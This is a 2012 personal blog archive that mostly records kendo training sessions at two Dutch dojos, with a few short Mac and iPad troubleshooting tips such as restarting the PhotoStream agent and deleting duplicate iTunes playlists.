After the theoretical part of class we proceeded with practice. We did nothing but kirikaeshi, oki-men and seme to men. Oh yes, a few rounds of uchikomi geiko as well. A very interesting class indeed! And because we were using the system where 2-3 students match up against one motodachi I was able to regulate my breathing well enough to make it 100% through class, including three rounds of keiko. In jigeiko I was matched up against mr. Mast (visiting), Kiwa-sempai and Lennart-sempai. In none of these fights did I have the feeling I was doing particularly well, but I did my best to keep in mind the day's lessons as well as Kris' recent lecture about my standard keiko mistakes.

It was pointed out that the seme movements we had been practicing do not only serve a big role in shiai and jigeiko, but that they are also very useful in uchikomi keiko. This was demonstrated by Kiwa-sempai who repeatedly got very close to Heeren-sensei before striking the designated targets. 

My seniors also pointed out flaws in my kendo.

I'm sure there was more, but it's hard to recall everything :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo in Almere: also adjusting our regimen

2012-09-22 21:37:00

Starting this season, Loyer-sensei and Kris-fukushou have indicated that they would like to start using a regimen similar to that used at Museido kendo dojo (which is where Kris originally hails from). Among other things, this means that:

One of the advanced waza that we practiced was maki-tsuki-men, using the spinning shinai from maki waza to open the road for a tsuki. The stab at the throat is not meant to score ippon, but is used to push into a strike on men. While we went through our practice, the beginners were led by Bob-sempai in learning kirikaeshi, which we then later practiced with them. I was very impressed by Herman-kouhai, whose kirikaeshi was better than mine! His strikes were very precise!

Loyer-sensei took me aside for two pointers:


kilala.nl tags: , ,

View or add comments (curr. 0)

Upping the game at training

2012-09-15 16:38:00

So far, I'm loving this season!

This morning both Ton-sensei and Kris-fukushou returned to teach class. Kris joined the in-bogu group, while Ton-sensei trained the beginners. Kris, knowing that two or three of us want to actively participate in more tournaments this year, decided to start pushing us more. And what a great class it was!

We started on a bit of an embarrassing down-note though. A show of hands by Kris proved that roughly five out of the nineteen kendoka present had actually performed shinai maintenance over the summer holiday. We were all warned to do our upkeep as it's for everybody's safety!

First up, our usual warming-up routine was followed by more men suburi. Every single kendoka was told to sound off ten strikes, meaning that we were to do 190 men strikes in a row! Wow! Sadly, I was the only one who couldn't keep up. I had to stop for a very short breather after 60, 100 and 150 strikes. It's awesome that the rest of the group managed to finish the exercise!

After that, footwork! Suriashi, variable suriashi, suriashi with hiki-fumikomi and finally "snaking" along the lines on the floor, practicing forward and sideways suriashi. It's during the snaking that I slightly twisted my ankle :)

Then, onwards to the rest of practice! Kirikaeshi, oki-men, oki-kote-men, hayai-kote-men, ai-men, maki-waza, maki-tsuki, hayai-kote with sidestep, debana-kote, all interspersed with five bouts of jigeiko. Afterwards, three rounds of uchikomi-geiko. So while last class in Amstelveen allowed for some breathers, today's class in Almere was killer. 

One important thing that Kris pointed out to both Martijn and myself: in keiko, we tend to "dance" around each other after strikes, instead of striking and rushing through the opponent. That's really bad and shows zero zanshin.

Unfortunately I had to bow out from one jigeiko and halfway through another one, but still I'm pretty happy with how things turned out. Onwards to the Fumetsu Cup in two weeks' time!


kilala.nl tags: , ,

View or add comments (curr. 0)

Back in bogu, a great class!

2012-09-12 08:16:00

Last night was my return to the Amstelveen dojo, after missing this season's first class due to standby duties. It really was an awesome class!

After putting myself back into the beginners' group in June, I'd been putting off getting back into bogu. Kendo class in Amstelveen is hard work and after my experiences from last season I was fearing another collapse. So instead I just dawdled in the beginners' section. I actually DID want to get back to real fighting though! So I weaseled around my anxieties!! Knowing beforehand that he would approve, I asked Roelof-sensei if he'd allow me back into bogu. It was also a great help that Mischa-sempai indicated that he thought I was being scared of bogu and that I should get back in :) So I did.

At the beginning of the season, Heeren-sensei informed all Renshinjuku kendoka that he would be demanding a higher level of performance from everyone. This would include an emphasis on proper etiquette, on perseverance and on attendance. It would also involve a more traditional training method which, let me tell you, was very helpful to me last night!

In the previous season, we would line up all kendoka against each other, making a big line of duos. After each practice we'd all move up one slot, thus facing another partner. What this does is ensure diversity, but it's also pretty harsh: there are zero breathers and you also often pit beginner against beginner. The more traditional approach that we used yesterday is the motodachi system: seven of our higher dan-graded members and teachers line up and everyone is divided into small groups pitted against them. This ensures that everyone only fights high level teachers, that people get the chance for a short breather and that you get plenty of mitori geiko (learning by watching). Without this system I would've dropped 'dead' halfway through class, instead of nearly making it to the end :) Hence I made sure to let Heeren-sensei know that I really enjoyed this schedule.

Practice, and some of the pointers I received, were:

Ten minutes before the end of class, after my last round of kihon with Bert-sempai, I caved. I wasn't breathing properly anymore and knew that if I pushed on I'd collapse. I asked permission from Heeren-sensei to bow out, which he gave. While the rest of class finished their kirikaeshi, I did breathing exercises to both regain my breath and to prevent a panic attack. Everything turned out well and I was feeling good again after dressing.

What a great class! I'm looking forward to Saturday and next Tuesday!


kilala.nl tags: , ,

View or add comments (curr. 0)

First class of the season, no sensei

2012-09-08 14:03:00

Last Tuesday the new kendo season started and today was the first scheduled class in Almere. We got off to an odd start, what with all three of our sensei being absent: holiday, holiday and holiday(?). So instead, Charel-sempai and Mischa-sempai (who is 2nd dan) took charge of our group. All in all they fared pretty well! Our group usually is (too) low on discipline and so a lot of people are chatty, but they managed to reel them in (with a little occasional support from Nick-sempai and myself).

In the absence of our usual teachers, we focused on basics. Charel and Mischa had both attended the recent summer seminar and were eager to transfer a few of the things they learned. 

An interesting class indeed and I'm very grateful for the help of Charel and Mischa.


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo season 2012/13

2012-09-04 22:00:00

Ten scratches on the wall

Tonight marks the start of the 2012/13 kendo season. Unfortunately I'm on standby shift for $CLIENT, so I couldn't make it to the first class in Amstelveen. 

Instead I did my detention work, given to me a few weeks ago by Heeren-sensei for posting a Japanese ballad to Facebook :) I can't help it, I just love "Kogarashi ni dakarete". In turn, he told me to do thirty minutes of kirikaeshi (video). It's a bit late, but it was a good start for the season. I did ten repetitions of three minutes, which is ten times four kirikaeshi. The last two repeats were hard, but it was worth it.

Onward into the new season! /o/

I'm considering enrolling for the Fumetsu Cup, which is on the 30th of September.


kilala.nl tags: , ,

View or add comments (curr. 0)

A night of volunteer work

2012-08-31 22:45:00

My classic hifi gear

Thanks to the combined efforts of my dear Marli and our awesome buddy Kaijuu my study in the attic now has a nifty hifi setup. You may recall that Marli brought home a record player, an amp and boxes full of records. Well, recently Kaijuu set me up with two of his old Technics speakers which, despite being huge and looking worse for wear, still provide excellent sound. So thanks to them, tonight's volunteer work is accompanied by Bach, Dvorak and a selection of operetta. Sadly, both the record player and the amp are showing their age: on some records the audio sounds rather fuzzy and the needle picks up plenty of pops and ticks. Hopefully that's something we can work on in the next few months.

I'm hard at work this Friday night, working on the new Renshinjuku website! I'm putting the final touches to the set of plugins and am translating all content to Dutch as well. I was very happy to learn about qTranslate, a WordPress plugin which makes multi-lingual websites a snap! Couldn't have done it without qTranslate!

Once I'm done, there's admin-work to be done: write a manual for our dojo officials, provide documentation and then hopefully we can quickly migrate the site to production.


kilala.nl tags: , ,

View or add comments (curr. 0)

Getting back in the game

2012-08-22 11:14:00

As I wrote last week I've been lazy. So to get back into the game I'm teaming up with my sempai Jeroen and Martijn.

Last night, Jeroen visited for an hour of kendo and muscle training (followed by some geekery). Aside from the basic stretching and suburi, he taught me some things about pushups, in order to improve the muscles in my shoulders and arms. The basic regimen to start me off is X reps of 5x normal, 5x wide, 5x narrow. Many thanks for that! Now all I need to do is follow through and actually DO this stuff.

My form and breathing in kendo are improving again, back towards their old state, but it requires constant reminding. I need to actively think of every step, to ensure I'm doing it right. After going for 100 hayasuburi (which Martijn achieved last week) my blistered left hand blistered some more and drew blood. Jeroen sempai made it to 130/140, while I caved around 70 :| That was down to my technique, because I started really shoving and yanking my shinai after 50, when my arms got tired. Form, form, form!

Three more weeks until class starts again in Almere (or two until Amstelveen). Need to get cracking!


kilala.nl tags: , ,

View or add comments (curr. 1)

My laziness messed up my sport

2012-08-18 20:08:00

Last Thursday, I picked up my shinai for the first time since our last class in early July. I suck. A month and a half without sports has messed up my form, my condition and my perseverance. It felt weird to face a hurdle to starting again and I didn't like it, because kendo is something I want to do!

Practicing suburi with Martijn, I noticed that I've lost everything I've learned in the past few months: I was holding my breath, I was blocking my neck and shoulders and I was pulling/pushing with my right hand. 

I felt so frustrated and disappointed with myself, because the only reason this happened is that I let it. So the only thing to do is to pick everything up again and get back to training! And instead of training with anger in my mind, I will use mokuso and relaxation practices (from my anxiety training) to get rid of it first.

I will pick up the Couch to 5k program again. Last Tuesday my sempai Jeroen (middle in the picture above) went for a run with me, which I really appreciated! At seventeen he's über-sporty and I enjoy training with him as he's gently supportive :) This morning I went for another run, using week 3 from Ease into 5k (instead of week 2, which I did on Tuesday). Tuesday I was knackered, but this morning went fine.

Time to get going!!! /o/


kilala.nl tags: , , , ,

View or add comments (curr. 1)

Basics, basics, basics

2012-07-10 22:18:00

First up: Marli kicks ass! Today she did her fifth repeat of the W1Dx of Ease into 5k. Today was the first time that she officially, completely, without any workarounds ran the plan 100% /o/ Impressive, for someone who has always hated running and who's been so-so about sports. I'm really proud. 

She's indicated that she would really like to finish the whole program, to get to running 5k. And after that? Would you believe that she dreams of working towards a marathon? Wow! In her words, "If the forty-something out-of-shape guy who started this whole 5k program thing can do it, so can my twenty-something out-of-shape self!"

So, while she's working on the basics, so am I... Tonight I again joined the beginners' group in Amstelveen to work on basic kendo. We did nothing but oki-men for the first forty minutes. Followed by oki-kote. I'm sad to say that the three of us were a bit brutish on Onno-sempai :| After that we practiced hayai-men, hayai-kote and kote-men with Kortewijn-sempai. From all of that the take-aways for me were:

Roelof-sensei made a funny analogy: kendo is like learning the piano. Your first year is learning the scales, your second year is chopsticks, your fifth year you're banging out Liszt. :D


kilala.nl tags: , , ,

View or add comments (curr. 0)

Learning about dojo layout

2012-06-24 13:56:00

Renshinjuku kendo dojo layout

I've been working on a new project for the Renshinjuku kendo dojo: a few months ago Heeren-sensei asked me to come up with some ideas for renewing the dojo's website. The past week I spent a few evenings putting together a new website, based on Wordpress. Part of this concept is a page providing details about the training locations: basic info, a Google Map and drawings of the dojo layout.

Making sketches of building layouts isn't a very hard job. Half an hour doodling with OmniGraffle gave me the basic drawings. But it's thanks to the great website of mr. Dillon Lin that I could fill in all the proper names! Mr. Lin's dillonlin.net site does in-depth articles on kendo dojo, both famous and local. It's a joy to read about kendo dojo from an architect's point of view, going into building design, flooring structure and history.

His article "Basic Dojo Layout" provided me with most of the terminology I needed for my own sketches.

In the image above, the building on the left is our Amstelveen dojo, while the building on the right is the one in Almere. The former is situated in a local sports facility from the 70s/80s, while the latter is in a brand-new high school building. While the facilities in Almere are much more modern compared to Amstelveen, the concrete+rubber floor in Almere is sub-optimal compared to the suspended wooden floor of A'veen.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Awesome session at Renshinjuku Almere

2012-06-23 18:52:00

Holy wow, today's class was awesome! After being absent from the Almere dojo for five weeks, this was a great day to return!

  1. We had twenty-five people in attendance! So many!
  2. We have so many newcomers and rookies! Kendo in Almere is growing :)
  3. We had two visiting nidansha, from the Amstelveen dojo.
  4. We fought, fought and fought some more.
  5. I was worn out! :D

Entering the dojo around 09:10 I was amazed! Already the room was packed and not everyone was there yet. We had barely enough room to practice kata while the newbies were doing kihon practice. Warming up was even tighter packed, with everyone in a circle. The group was pressed up against all the walls and not half an hour into class we threw open the fire doors for some fresh air. ( ^_^)

As Jeroen had already pointed out to me, class changed a little bit. After warming up we immediately put our gear on (skipping the footwork practice we usually do) and went into kihon and waza practice. Oki-men, hayai-men, oki-kote, kote-men, oji-kote and oji-men. After that: jigeiko! While Kris spent some time with the nidansha, we were told to hold two-minute fights amongst ourselves. 

I fought Sander and Jeroen: those fights were awkward insofar as both fighters kept pushing and ramming against each other instead of "talking". I also let Ramon practice oki-men on me some more :) Then, as I took a short breather by the fire exit, Kris was ready with his coaching and he was itching for a fight! So he grabbed me and we went at it for five minutes!

I was spoilt! To get five private minutes with Kris! If anything, what that time taught me about my keiko is that I am now stuck waiting and not paying attention, instead of my original flaw: simply rushing in. Kris would be wide open and I'd just be staring him in the eyes. Or his shinai would be this -><- close to me, deep within my ma'ai, and I wouldn't even notice that he'd crept so close!

Class went into overtime (we finished twenty minutes late), because the whole group was run through no less than five rounds of uchikomi geiko! Followed by all kendoka in bogu doing a round of kakari geiko against Kris. Afterwards I was spent, but I haven't felt this good in a long while! :D

A great class! :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Photostream: how to restart the agent after sleep

2012-06-22 20:38:00

Finally! I have finally figured out how to restart the PhotoStream agent, after waking my MacBook from its sleep!

After figuring out how to access the PhotoStream data through Finder, I now needed a way to trigger a synchronization in the Stream. Normally, after setting up PhotoStream in OS X system preferences, the agent software will be started when you login to your desktop. However, this says nothing about potential restarts after sleeping your Mac. 

First I dug around in launchd / launchctl and quickly discovered the full name of the agent: com.apple.photostream-agent

After that, things got difficult as I couldn't find any configuration file to load the agent with once it had been kicked out of launchd. So you can launchctl [stop|start] all you want, but once you launchctl unload it, you cannot load the agent back in.

I found that the actual agent appears to be an application in /Applications/iPhoto.app/Contents/Library/LoginItems. There you will find PhotoStreamAgent.app, which can be run and which will in fact load com.apple.photostream-agent. However, this will not be the vanilla one, but one with an extra label in front of it.
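
For reference, a rough Terminal sketch of the approach described above; the label and path are the ones mentioned in this post and may differ on other OS X or iPhoto versions:

  launchctl list | grep photostream    # check whether com.apple.photostream-agent is (still) loaded
  open "/Applications/iPhoto.app/Contents/Library/LoginItems/PhotoStreamAgent.app"    # relaunch the agent by hand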

Mmm, this doesn't seem to work properly yet. I'll need to do some more research.


kilala.nl tags: , ,

View or add comments (curr. 0)

Practicing the basics: footwork, oki-men and breathing

2012-06-20 12:23:00

As I wrote recently: it's highly important that I strongly focus on the basics for the next few weeks. Last night and hopefully one or two more nights this week, I'm focusing on:

So. Nothing special during home training this week (or next), just grinding the millstone on essential basics.


kilala.nl tags: , ,

View or add comments (curr. 2)

Sure, let's give it a try

2012-06-16 20:01:00

HG sports clothing detergent

It's not often that Marli gets excited about cleaning commercials. While I was making tea in the kitchen, she excitedly "Ooh! Ooh! Ooh!"s me back into the living room and rewinds the PVR. It was an ad for HG's detergent for sports clothing.

As we all know kendo stinks. Kendo armour gets a bit smelly, kendo gloves can get pretty bad and my keikogi (the jacket) is godawful every single week. Hence Marli's enthusiasm. Let's give it a shot then :)


kilala.nl tags: , , ,

View or add comments (curr. 2)

Back to basics in kendo

2012-06-12 22:21:00

It is my intention to train without bogu at Amstelveen, for the next few weeks: back to basics!

After last week's class eye-openers I've asked Roelof-sensei to take Miyahara-sensei's remarks into account, so we can ensure that the two basic flaws in my kendo can be remedied:

  1. My breathing
  2. My footwork, esp the stepping through after fumikomi

I am glad that he agreed and I had a great class tonight. After going over all of the basic stances, I practiced suriashi with the other bogu-less kendoka. In between, we watched the advanced techniques being explained by Makoto-sempai and the others. This included the differences between de-gote, nuki-waza and kaeshi-waza (some of which is still vague to me, so I need to do some reading!).

During our practice of oki-men, Roelof-sensei also grabbed my shoulder. He saw a big flaw in my timing and he would only let me move forward or backward at the exact right time. This timing is way different from what I've been using on large men-strikes so far! In this case, the right way to do it is to only start moving once you're already halfway through your downswing. Because only then is the distance that the shinai needs to travel equal to the required instep and fumikomi! This is what Kris-fukushou has been trying to get me to understand! He always told me to "step in later!", but it never clicked -when- this "later" was :)

Other people who helped a lot:

Saturday I can finally join class in Almere again. After oodles of family and work events, I'm back to training in my home town. I'm ready to kick some ass! And to get my ass kicked! ( ^_^)


kilala.nl tags: , ,

View or add comments (curr. 0)

Two big eye openers during kendo class

2012-06-05 22:48:00

Wow! Tonight was bad. Bad, insofar that I made a lot of mistakes and was "crap" in general. On the other hand it was awesome because I had an epiphany tonight. Two even! I'm very grateful for the sharp eyes of Roelof-sensei and Miyahara-sensei.

The eye openers are:

  1. A huge flaw in my fumikomi.
  2. I finally understand breathing.

First up, during kihon practice (we were doing oki men) Miyahara-san saw something about my footwork. She tried to explain it, but at the time I failed to grasp what she was saying. So after class I went up to her to ask what it was that she saw. 

In my striking of oki men, Miyahara-sensei saw me cross my legs. I do fumikomi on my right, then step past it with left. That's just awful, especially because I do not even feel it happening! I honestly thought I was sticking to suri-ashi! It is such a basic flaw that she told me that she thinks I need to get out of bogu again and keep on practicing the basics. She was taken aback that I do not feel it happening and was sure that this must have shown up before. 

She was right of course! Back in March, Kris-fukushou pointed it out to me during footwork training. And when Marli came to observe our class in January she actually noticed that many of our students have the same problem: fumikomi on right, then cross with the left, then go back to suri-ashi.

Second up: it has finally clicked! What Roelof-sensei has been trying to tell me in different words for the past three months has finally clicked! I finally get what he was trying to tell me about my breathing! Regardez, the graph below might be crappy, but it explains what I'm describing below. The blue line is breathing, the red line is striking. It's a rough sketch, so on the second graph the blue line doesn't dip deep enough. Sorry! ( ^_^)

kendo breathing rhythm

It all clicked when Roelof-sensei changed his wording to include one new term: "make sure you have a fluidly rolling breath".

What I've been doing so far was timing my breathing based on my striking: inhale sharply on the upswing and exhale sharply on the strike. This leaves me winded very quickly (as witnessed today, where I was worn out after three kirikaeshi and five rounds of kihon). What I should instead be doing is breathing naturally in a nice sinusoid: in-out-in-out, a nice wave pattern. I should then time my striking based on that: upswing when I near the peak of my inhalation, strike when the exhale starts.

Like the footwork problem described earlier, this is a complete return to the basics. I need to practice A LOT on the very, very basics to get this stuff right! And I need to remember all these things at the same time, to improve them at the same time. It sucks that my memory's so awful and I even forget things within a day. 

I am very grateful that Marli agreed to let me train twice a week! The extra practice is of course very helpful, but it's also very important that the crowd in Amstelveen is so different: many higher ranking kendoka, who quickly zero in on problems I'm having.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Apple iTunes Match: problem with many copies of same playlist

2012-05-31 19:21:00

Sadly, not all things Apple are awesome. 

While I love the idea of the iTunes Match service, it's fraught with problems. One of the most commonly seen problems is when Match creates dozens if not hundreds of duplicates of a playlist. In my case there are over 500 copies of an "On the go" playlist. This kills performance in iTunes and occasionally also in your iPod / Music iOS application.

Luckily it's easy to clean up these copies using an AppleScript:

with timeout of (45 * 60) seconds
          tell application "iTunes"
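                    -- Replace "NAME OF PLAYLIST" with the duplicated list's name, e.g. "On the go".
                    -- The 45-minute timeout above gives iTunes time to chew through hundreds of copies.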
                    delete (every playlist whose name is "NAME OF PLAYLIST")
          end tell
end timeout

With many thanks to Apple Support Forum member TRujder who explained the script here.


kilala.nl tags: , ,

View or add comments (curr. 0)

Accessing Photostream without using iPhoto

2012-05-19 17:22:00

Finally! I've been searching for this for quite a while now and I finally found the solution!

Question: "How can I access iCloud Photostream without using iPhoto?"

Answer: "By accessing ~/Library/Application Support/iLifeAssetManagement/assets/sub/ and searching for all images."

Here is the source for this information. The best thing: you can obviously store this procedure as a Saved Search in the sidebar, so you'll always have a shortcut to your Photostream.
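
For the Terminal-inclined, a rough alternative to that Saved Search. This is only a sketch: the photostream-dump folder is a name I made up, and the path may well change in later iPhoto releases.

  mkdir -p ~/Desktop/photostream-dump
  find ~/Library/Application\ Support/iLifeAssetManagement/assets/sub -type f \( -iname '*.jpg' -o -iname '*.png' \) -exec cp {} ~/Desktop/photostream-dump/ \;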


kilala.nl tags: , ,

View or add comments (curr. 0)

iPad 2 sound issues: headphones work, speakers do not

2012-05-16 09:57:00

Apparently, there are plenty of people who experience problems with their iPad 2 pertaining to the internal speaker. Specifically: the iPad refuses to play audio and the volume slider does not work. Thanks to some troubleshooting and help from the Apple support fora I've fixed our iPad.

Symptoms:

A lot of people hypothesized that the problems are linked to the upgrade to iOS 5, or that you need to flip the hardware switch settings between "mute" and "rotation lock" a few times.

It's none of that. As forum member Val E Um notes, it's the dock connector: something is glitching, making the iPad think that it's dock-connected to external speakers. By wiggling a dock cable in the iPad I could make the volume slider appear and disappear. If I wedged the dock connector in at just the right angle, sound kept on working.

The solution: take an alcohol wipe, wrap it around a stiff piece of cardboard and scrape the dock connector on the iPad. Of course, first power down the iPad! After cleaning the dock connector, my sound problems are over :)


kilala.nl tags: , ,

View or add comments (curr. 5)

A tale of two dou

2012-05-12 12:14:00

I felt a bit guilty about going to practice today (having cost us the chance of a nice party last night), so I hesitate to say this: what a great session! /o/

Aside from the fact that my messed-up breathing left me winded for 2x2 minutes, it went great! We started practice together with the bogu-less kouhai: warmup and kirikaeshi. We then quickly split up to practice basic drills: oki-men, hayai-men, kote-men, ai-men and then the lovely kote-men-taiatari-hikimen-aimen! The biggest reason my ai-men is failing is that I pull the shinai waaay too far backwards. I often make the same mistake with a vanilla hayai-men.

And that was that! The rest of class was shiai!

Tomorrow, three teams from Renshinjuku will participate in the annual Edo Cup in Amsterdam. Nick, Bob and Charel sempai will represent the Almere dojo, while Amstelveen will send two other teams. Because of this tournament, Ton-sensei and Kris-fukushou wanted to run through competition preparation again. After the basic etiquette, we got things on the road. For every team member there were two opponents (three in Bob's case), and I went up against him.

They weren't the cleanest hits and I believe that Kris was reluctant to count one of them, but at least I'm happy to be showing some progress. ( ^_^) My fight against Kris went pretty well and I lost because of a stupid mistake: I thought he had landed a valid blow, so I dropped my whole guard, and he hit me again perfectly. Apparently the first blow was in fact not good enough, so that was a valuable lesson I learned: do NOT stop fighting until you are told to do so. 

The biggest problem that Ton-sensei and Kris pointed out is that nobody was 'talking' or building tension with their opponent. Just about everybody just leapt in there, trying to hit stuff. I had very consciously been trying to avoid doing that, but I need more! "Take your time and explore your opponent! Get to know him!" was the big take-away.


kilala.nl tags: , ,

View or add comments (curr. 1)

Exchanging blows with colleagues

2012-05-11 08:00:00

Misleading title FTW. /o/ For once I'm not writing about another colleague I pissed off :p

Yesterday was the annual field trip of my department at $CLIENT. After a last-minute change of plans due to the weather we all gathered at a far-away gymnasium to partake in an introductory class in fencing. Sabre fencing to be specific.

I enjoyed it, fencing's cool! :) If I weren't into kendo already, I would've probably picked up fencing especially because Almere has a rather large club. Reminds me of another company outing, which led to me trying a new sport.

Here are some observations based on my kendo experience:


kilala.nl tags: , ,

View or add comments (curr. 0)

Mitori geiko, round two

2012-05-09 05:59:00

Last night was a valuable class in Amstelveen. From the side lines I might not have been able to hear every single line from the senseis' explanation, but I did get a good hard look and I got the chance to ask questions later. Here's a bunch of things I wrote down.

I also got a chance to talk to Heeren-sensei about some of the stuff I've been working on. Apparently the badges are on their way to the Netherlands now (200x Amstelveen, 100x Almere) and they will be sold at 1 euro a piece!

He also asked me to work with one of our dojo's sempai to improve the kanji writing on the back of the grey shirt. Supposedly my attempt at the kanji looks too Chinese and sensei was asked by a few Japanese whether he was advertising for a new restaurant :P


kilala.nl tags: , ,

View or add comments (curr. 0)

Airport Extreme custom DNS setup issues

2012-05-07 17:55:00

Airport DNS setup

Tonight, it seems that UPC are having DNS issues. I was startled that we even noticed it, because I thought we were using OpenDNS. Not so apparently. When I went to change the configuration of our Airport Extreme I found the DNS IP boxes to be greyed out. WTF?

Turns out that, in the new Airport Utility, one needs to do the following:

And presto! It works. No idea why the DNS boxes work that way, but they do. Oh well. At least our DNS problems are over :p


kilala.nl tags: , , ,

View or add comments (curr. 0)

Mitori geiko at Renshinjuku Almere

2012-05-05 16:48:00

Today Marli and I decided against me joining kendo practice: I'm still aching from my wisdom tooth extraction and the medicine they prescribed me is doing me in (dizziness, messed-up stomach). So today was an ideal moment for mitori geiko: "learning by watching". I've got to admit that, from the sidelines, it's a whole different view! Now that I'm not actively fighting, I have all the time in the world to drink in all manner of small details. 

For starters, because I was the third one to enter the dojo, I got to watch Ton-sensei take Ramon through some of the precise details of kata #2 and kata #3. I have to say that I've always been mightily impressed with Ramon's control of the bokken: he strikes precisely and very fast and of course he stops on target :)

After that I invited kouhai Sven to learn the first kata, after Ton-sensei suggested he ask someone to show him. He learned the shidachi-side of the kata pretty quickly and I hope to take him through #1 and #2 next week. Very impressive: Sven got the eye contact thing down from the get-go! Many starters focus on feet, hands or bokken, but he kept looking me in the eye! Very good!

Once class started I relegated myself to the sidelines. It's funny, the things you notice from there.

There's just so much :)

Tuesday I'll do mitori geiko once more in Amstelveen and by next Saturday I hope to be back in armor again. I'm also planning a social night for some of the guys from Almere, to talk but mostly to do maintenance on our equipment. I'm sad to say that many people never take their shinai apart and only do rough checks along the edges once in a while. It's for our friends' safety that we have to check our swords very regularly. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Lots of newbies, few experienced players

2012-04-22 21:07:00

Saturday's kendo class was a great one, though it was pretty out of the ordinary. 

For starters, aside from Ton-sensei there were only four of us in bogu. Martijn, Jeroen, Felix and Aaron were all out of armor due to minor injuries, so that left us with a rather small group of folks actively fighting. While my small group was doing more advanced practice, Martijn and Jeroen took charge of the large group of newbies. There were three folks who'd never been with us before, to check it out. And there are one or two guys who've been tagging along for a few weeks. 

So, what did we do? No footwork practice! After warmup we went straight into kirikaeshi, followed by kihon and waza practice. Most notably: men uchi, fast men uchi, fast kote, fast kote-men, harai men, harai kote, harai kote-men and maki waza. Each of these we did for 4x3 repetitions. The last fifteen to twenty minutes of class were spent on jigeiko, where I definitely felt that I was too tense in my arms. How? Because I couldn't stand through more than two geiko and had to be dragged through the third. 

I've said it before and I'll say it again: I'm very grateful for guys like Nick, Charel and Hudaifa who egg me on in a fight. When I pussy out, they tell me to keep going. "Attack just once more! Keep going! I'll let you go once you've scored a point!" Things like that ( ^_^)

The most important thing I'm taking away from this class is something I also realized after taking part in the NK: kendo is a dialogue. I should not just rush in and try to whack at targets. Wait it out. "Talk" to my opponent, so we can decide who gets to score which point. Ton-sensei specifically berated me for rushing in. And Charel-sempai suggested that I simply work towards the ikkyu grading: "It doesn't matter who attacks more, or even who wins! As long as you make good strikes and show good technique, then you'll make progress."


kilala.nl tags: , ,

View or add comments (curr. 0)

Renshinjuku Kendo clothing

2012-04-19 18:53:00

Two t-shirts

As I mentioned earlier today, I've designed a bunch of clothes for the Renshinjuku Kendo dojo. I originally started work on these designs sometime in January and gave it a fresh start with renewed vigour after designing the Renshinjuku Almere logo. My original goal was to have some RSJ-branded sports gear for my running practice, but after finishing the first designs I decided to set up a shop for all RSJ members. I've been dealing with Spreadshirt for a few years now and I've always been very happy with their work, so logically the shop's run by them.

For each design, there are four versions: one for Amstelveen, one for Almere, split into ladies' and gentlemen's fit. The full range of clothes consists of...

Shown above are the sports shirt (white) and the normal t-shirt (grey).


kilala.nl tags: , ,

View or add comments (curr. 0)

It's nice to see my handiwork in real life

2012-04-19 07:15:00

Badges for our dojo

This morning I received an email from Heeren-sensei, the founder of our kendo dojo. A few weeks back I'd sent him the vector files I'd made for the Amstelveen and Almere dojo logos. After discussing the matter for weeks and months I designed the Almere logo, based on the Amstelveen original, and after a few rounds with Heeren-sensei, Ton-sensei, and Peter and Zicarlo sempai we'd come to a design to everybody's liking.

Now... That email contained a sample of badges that Heeren-sensei is having sourced from Pakistan, based on the vector files I put together. I'd lie if I said I wasn't at least a little proud (^_^;) IMNSHO, the badges look awesome! If I can I'll order at least three badges: one for my gi, one for my next gi and one for a sweater.

Oddly, I seem to have forgotten to post photos of the clothing I've designed. I'll do that RSN. I've had some great compliments from students and teachers alike :) Bob and Nick were so darn happy last Saturday, strutting their stuff in the dressing room. I have to admit, those vests really are soooo soft <3


kilala.nl tags: , ,

View or add comments (curr. 2)

Kicking my own ass and then getting it kicked as well

2012-04-18 10:34:00

Over the past few days my mood had been getting increasingly bad. I was on edge, tired and just not relaxing. I think that a lot of that can be attributed to my recent interest in CC:TA. In my earlier blog post I wrote the game was addictive and it is: it'd become too easy to just waste a whole evening staring at that screen. "Let's raid a camp or two. Okay, I'm through my CP, so let's do base maintenance. Okay, now what? 45 minutes before I can do anything else. Okay, let's read the forum and do some diplomacy!" And so on. All the reasons why I never got into WoW.

Then, last night I was this -> <- close to skipping kendo practice again, because of my foul mood. And as I sat there, watching the CC:TA screen, already five minutes late for leaving, I decided to quit the game. I'll set up my base so my alliance mates can raid it and then I'm out. Fsck that, I've got plenty of better things to do. It's a fun game, but nothing more than that.

Marli helped me greatly! "Do I need to push you to go?" And so she did. She quickly helped me pack all my gear and sent me on my way to Amstelveen. Gotta love that girl! ( ^_^)

Luckily I was only a few minutes late and I was just in time to join in with the warming up. After that followed kihon, followed by geiko and more geiko. The group was smaller than usual, but there were many high-level kendoka, including three from the dutch national team! I bowed out from the second round of geiko (the last twenty minutes of class) as I was feeling exhausted and was afraid I wouldn't make it back home.

Pointers I received from several of my sempai:

Thanks to Chung-sempai I now also know what a mouse feels like, when toyed with by a cat. During geiko, with every strike of mine, she darted aside and retaliated with two quick strikes and a giggle. I couldn't help but smile, while getting my ass handed to me.

Also, I don't think we've ever introduced ourselves so I don't know his name. One of the young guys who started in bogu only three weeks ago. He clocked me on my elbow with his tsuba. Twice. Hard. Man that hurt! ( ^_^) Arm's fine today, no worries.


kilala.nl tags: , , , , ,

View or add comments (curr. 3)

Yech! I can tell I've been slacking

2012-04-16 09:10:00

My performance in Saturday's class was a disgrace. I can tell that I've been slacking off the past two weeks. I haven't run on a daily basis and I've skipped kendo for a week as well. All of that showed: not half an hour into class, I bowed out and joined the beginners' group. I couldn't push myself onward. Or is it "didn't" instead of "couldn't"? It could very well be ( =_=)

Right. Aside from my shitty performance, the biggest thing to note is that my timing on ki-ken-tai-ichi is off. Waaay off. My foot work is way ahead of my cutting. Ton-sensei specifically told me to practice this at home very frequently. 

On the good side of things: Bob and Nick were so damn happy with their Renshinjuku clothes! You may recall that I started designing some clothes in January. Those garments have gone through a number of iterations and now they look great! A few people have ordered sets of shirts and sweaters from the Spreadshirt store and so far everyone's happy :)


kilala.nl tags: , , ,

View or add comments (curr. 1)

Anxiety and discouragement

2012-04-03 17:19:00

Last time I went to the Amstelveen dojo, I had an anxiety attack (only a slight one) after being thoroughly exhausted by the training. At the time it wasn't safe for me to drive myself home, so I was lucky to have Martijn with me. That one event has thrown up a barrier for me to go to Amstelveen alone.

